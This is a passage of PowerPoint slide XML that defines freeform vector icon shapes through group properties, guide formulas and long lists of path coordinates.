                    <a:pt x="5013" y="1764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929" y="1701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4851" y="1637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4772" y="1569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4698" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="1422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4557" y="1343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4493" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4430" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4373" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="1008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4179" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4142" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4053" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4016" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4657" y="3916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4483" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="3937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4672" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4687" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4677" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5192" y="7202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5596" y="6499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5995" y="7202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="7202"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3496" y="2231"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3496" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="2262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="223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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="104" name="Group 103"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-18431" y="1430013"/>
              <a:ext cx="2629525" cy="2582541"/>
              <a:chOff x="-76702" y="1304314"/>
              <a:chExt cx="2629525" cy="2582541"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="136" name="Freeform 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-76702" y="1304314"/>
                <a:ext cx="2629525" cy="2200406"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2194 w 7403"/>
                  <a:gd name="T1" fmla="*/ 0 h 6195"/>
                  <a:gd name="T2" fmla="*/ 2162 w 7403"/>
                  <a:gd name="T3" fmla="*/ 215 h 6195"/>
                  <a:gd name="T4" fmla="*/ 2121 w 7403"/>
                  <a:gd name="T5" fmla="*/ 425 h 6195"/>
                  <a:gd name="T6" fmla="*/ 2052 w 7403"/>
                  <a:gd name="T7" fmla="*/ 629 h 6195"/>
                  <a:gd name="T8" fmla="*/ 1974 w 7403"/>
                  <a:gd name="T9" fmla="*/ 819 h 6195"/>
                  <a:gd name="T10" fmla="*/ 1874 w 7403"/>
                  <a:gd name="T11" fmla="*/ 1008 h 6195"/>
                  <a:gd name="T12" fmla="*/ 1764 w 7403"/>
                  <a:gd name="T13" fmla="*/ 1181 h 6195"/>
                  <a:gd name="T14" fmla="*/ 1637 w 7403"/>
                  <a:gd name="T15" fmla="*/ 1343 h 6195"/>
                  <a:gd name="T16" fmla="*/ 1496 w 7403"/>
                  <a:gd name="T17" fmla="*/ 1496 h 6195"/>
                  <a:gd name="T18" fmla="*/ 1343 w 7403"/>
                  <a:gd name="T19" fmla="*/ 1637 h 6195"/>
                  <a:gd name="T20" fmla="*/ 1181 w 7403"/>
                  <a:gd name="T21" fmla="*/ 1764 h 6195"/>
                  <a:gd name="T22" fmla="*/ 1008 w 7403"/>
                  <a:gd name="T23" fmla="*/ 1874 h 6195"/>
                  <a:gd name="T24" fmla="*/ 819 w 7403"/>
                  <a:gd name="T25" fmla="*/ 1974 h 6195"/>
                  <a:gd name="T26" fmla="*/ 629 w 7403"/>
                  <a:gd name="T27" fmla="*/ 2052 h 6195"/>
                  <a:gd name="T28" fmla="*/ 425 w 7403"/>
                  <a:gd name="T29" fmla="*/ 2121 h 6195"/>
                  <a:gd name="T30" fmla="*/ 215 w 7403"/>
                  <a:gd name="T31" fmla="*/ 2162 h 6195"/>
                  <a:gd name="T32" fmla="*/ 0 w 7403"/>
                  <a:gd name="T33" fmla="*/ 2194 h 6195"/>
                  <a:gd name="T34" fmla="*/ 0 w 7403"/>
                  <a:gd name="T35" fmla="*/ 6194 h 6195"/>
                  <a:gd name="T36" fmla="*/ 551 w 7403"/>
                  <a:gd name="T37" fmla="*/ 6158 h 6195"/>
                  <a:gd name="T38" fmla="*/ 1086 w 7403"/>
                  <a:gd name="T39" fmla="*/ 6069 h 6195"/>
                  <a:gd name="T40" fmla="*/ 1606 w 7403"/>
                  <a:gd name="T41" fmla="*/ 5943 h 6195"/>
                  <a:gd name="T42" fmla="*/ 2110 w 7403"/>
                  <a:gd name="T43" fmla="*/ 5769 h 6195"/>
                  <a:gd name="T44" fmla="*/ 2593 w 7403"/>
                  <a:gd name="T45" fmla="*/ 5559 h 6195"/>
                  <a:gd name="T46" fmla="*/ 3050 w 7403"/>
                  <a:gd name="T47" fmla="*/ 5312 h 6195"/>
                  <a:gd name="T48" fmla="*/ 3491 w 7403"/>
                  <a:gd name="T49" fmla="*/ 5029 h 6195"/>
                  <a:gd name="T50" fmla="*/ 3900 w 7403"/>
                  <a:gd name="T51" fmla="*/ 4714 h 6195"/>
                  <a:gd name="T52" fmla="*/ 4289 w 7403"/>
                  <a:gd name="T53" fmla="*/ 4367 h 6195"/>
                  <a:gd name="T54" fmla="*/ 4640 w 7403"/>
                  <a:gd name="T55" fmla="*/ 3989 h 6195"/>
                  <a:gd name="T56" fmla="*/ 4966 w 7403"/>
                  <a:gd name="T57" fmla="*/ 3580 h 6195"/>
                  <a:gd name="T58" fmla="*/ 5255 w 7403"/>
                  <a:gd name="T59" fmla="*/ 3150 h 6195"/>
                  <a:gd name="T60" fmla="*/ 5512 w 7403"/>
                  <a:gd name="T61" fmla="*/ 2693 h 6195"/>
                  <a:gd name="T62" fmla="*/ 5732 w 7403"/>
                  <a:gd name="T63" fmla="*/ 2215 h 6195"/>
                  <a:gd name="T64" fmla="*/ 5911 w 7403"/>
                  <a:gd name="T65" fmla="*/ 1716 h 6195"/>
                  <a:gd name="T66" fmla="*/ 6047 w 7403"/>
                  <a:gd name="T67" fmla="*/ 1202 h 6195"/>
                  <a:gd name="T68" fmla="*/ 7402 w 7403"/>
                  <a:gd name="T69" fmla="*/ 0 h 6195"/>
                  <a:gd name="T70" fmla="*/ 3969 w 7403"/>
                  <a:gd name="T71" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T72" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T73" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T74" fmla="*/ 3370 w 7403"/>
                  <a:gd name="T75" fmla="*/ 3338 h 6195"/>
                  <a:gd name="T76" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T77" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T78" fmla="*/ 2766 w 7403"/>
                  <a:gd name="T79" fmla="*/ 3338 h 6195"/>
                  <a:gd name="T80" fmla="*/ 2467 w 7403"/>
                  <a:gd name="T81" fmla="*/ 4236 h 6195"/>
                  <a:gd name="T82" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T83" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T84" fmla="*/ 1868 w 7403"/>
                  <a:gd name="T85" fmla="*/ 1837 h 6195"/>
                  <a:gd name="T86" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T87" fmla="*/ 1537 h 6195"/>
                  <a:gd name="T88" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T89" fmla="*/ 1837 h 6195"/>
                  <a:gd name="T90" fmla="*/ 3969 w 7403"/>
                  <a:gd name="T91" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T92" fmla="*/ 6499 w 7403"/>
                  <a:gd name="T93" fmla="*/ 598 h 6195"/>
                  <a:gd name="T94" fmla="*/ 7202 w 7403"/>
                  <a:gd name="T95" fmla="*/ 1002 h 6195"/>
                  <a:gd name="T96" fmla="*/ 2168 w 7403"/>
                  <a:gd name="T97" fmla="*/ 2435 h 6195"/>
                  <a:gd name="T98" fmla="*/ 2766 w 7403"/>
                  <a:gd name="T99" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T100" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T101" fmla="*/ 2435 h 6195"/>
                  <a:gd name="T102" fmla="*/ 3669 w 7403"/>
                  <a:gd name="T103" fmla="*/ 3040 h 6195"/>
                  <a:gd name="T104" fmla="*/ 3066 w 7403"/>
                  <a:gd name="T105" fmla="*/ 2435 h 6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7403" h="6195">
                    <a:moveTo>
                      <a:pt x="2194" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2194" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2178" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2162" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2141" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2121" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2089" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2052" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2015" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1974" y="819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1926" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1874" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1821" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1764" y="1181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1701" y="1265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1637" y="1343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1569" y="1422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="1496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="1569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1343" y="1637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="1701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="1764"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1096" y="1821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1008" y="1874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="913" y="1926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="1974"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="2015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="2052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="2089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="2121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="2141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="2162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="2178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="6184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="6158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="6121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1086" y="6069"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="6011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1606" y="5943"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1858" y="5864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2110" y="5769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2352" y="5669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2593" y="5559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2824" y="5444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3050" y="5312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3275" y="5176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3491" y="5029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3701" y="4877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3900" y="4714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4100" y="4546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4289" y="4367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4467" y="4179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4640" y="3989"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4808" y="3785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4966" y="3580"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5113" y="3370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5255" y="3150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5391" y="2923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5512" y="2693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5628" y="2456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5732" y="2215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5827" y="1968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5911" y="1716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5985" y="1459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6047" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7402" y="1202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7402" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2194" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3969" y="3040"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3669" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3370" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3370" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="3338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2467" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="4236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1868" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1868" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="1537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3969" y="1837"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3969" y="3040"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="7202" y="1002"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6499" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7202" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7202" y="1002"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2766" y="2435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2168" y="2435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2168" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2766" y="2435"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3066" y="2435"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3066" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="3040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3669" y="2435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3066" y="243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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="137" name="Group 136"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="164480" y="1944859"/>
                <a:ext cx="2297507" cy="1941996"/>
                <a:chOff x="5356225" y="4513263"/>
                <a:chExt cx="2328863" cy="1968500"/>
              </a:xfrm>
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="138" name="Freeform 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5356225" y="6210300"/>
                  <a:ext cx="177800" cy="271463"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 225 w 494"/>
                    <a:gd name="T1" fmla="*/ 641 h 752"/>
                    <a:gd name="T2" fmla="*/ 283 w 494"/>
                    <a:gd name="T3" fmla="*/ 651 h 752"/>
                    <a:gd name="T4" fmla="*/ 325 w 494"/>
                    <a:gd name="T5" fmla="*/ 635 h 752"/>
                    <a:gd name="T6" fmla="*/ 346 w 494"/>
                    <a:gd name="T7" fmla="*/ 604 h 752"/>
                    <a:gd name="T8" fmla="*/ 352 w 494"/>
                    <a:gd name="T9" fmla="*/ 567 h 752"/>
                    <a:gd name="T10" fmla="*/ 346 w 494"/>
                    <a:gd name="T11" fmla="*/ 520 h 752"/>
                    <a:gd name="T12" fmla="*/ 325 w 494"/>
                    <a:gd name="T13" fmla="*/ 451 h 752"/>
                    <a:gd name="T14" fmla="*/ 299 w 494"/>
                    <a:gd name="T15" fmla="*/ 420 h 752"/>
                    <a:gd name="T16" fmla="*/ 257 w 494"/>
                    <a:gd name="T17" fmla="*/ 409 h 752"/>
                    <a:gd name="T18" fmla="*/ 168 w 494"/>
                    <a:gd name="T19" fmla="*/ 320 h 752"/>
                    <a:gd name="T20" fmla="*/ 236 w 494"/>
                    <a:gd name="T21" fmla="*/ 310 h 752"/>
                    <a:gd name="T22" fmla="*/ 262 w 494"/>
                    <a:gd name="T23" fmla="*/ 284 h 752"/>
                    <a:gd name="T24" fmla="*/ 278 w 494"/>
                    <a:gd name="T25" fmla="*/ 252 h 752"/>
                    <a:gd name="T26" fmla="*/ 278 w 494"/>
                    <a:gd name="T27" fmla="*/ 184 h 752"/>
                    <a:gd name="T28" fmla="*/ 262 w 494"/>
                    <a:gd name="T29" fmla="*/ 126 h 752"/>
                    <a:gd name="T30" fmla="*/ 242 w 494"/>
                    <a:gd name="T31" fmla="*/ 105 h 752"/>
                    <a:gd name="T32" fmla="*/ 194 w 494"/>
                    <a:gd name="T33" fmla="*/ 100 h 752"/>
                    <a:gd name="T34" fmla="*/ 157 w 494"/>
                    <a:gd name="T35" fmla="*/ 115 h 752"/>
                    <a:gd name="T36" fmla="*/ 136 w 494"/>
                    <a:gd name="T37" fmla="*/ 142 h 752"/>
                    <a:gd name="T38" fmla="*/ 131 w 494"/>
                    <a:gd name="T39" fmla="*/ 184 h 752"/>
                    <a:gd name="T40" fmla="*/ 5 w 494"/>
                    <a:gd name="T41" fmla="*/ 252 h 752"/>
                    <a:gd name="T42" fmla="*/ 10 w 494"/>
                    <a:gd name="T43" fmla="*/ 115 h 752"/>
                    <a:gd name="T44" fmla="*/ 58 w 494"/>
                    <a:gd name="T45" fmla="*/ 53 h 752"/>
                    <a:gd name="T46" fmla="*/ 183 w 494"/>
                    <a:gd name="T47" fmla="*/ 5 h 752"/>
                    <a:gd name="T48" fmla="*/ 272 w 494"/>
                    <a:gd name="T49" fmla="*/ 0 h 752"/>
                    <a:gd name="T50" fmla="*/ 346 w 494"/>
                    <a:gd name="T51" fmla="*/ 26 h 752"/>
                    <a:gd name="T52" fmla="*/ 409 w 494"/>
                    <a:gd name="T53" fmla="*/ 115 h 752"/>
                    <a:gd name="T54" fmla="*/ 425 w 494"/>
                    <a:gd name="T55" fmla="*/ 189 h 752"/>
                    <a:gd name="T56" fmla="*/ 409 w 494"/>
                    <a:gd name="T57" fmla="*/ 268 h 752"/>
                    <a:gd name="T58" fmla="*/ 378 w 494"/>
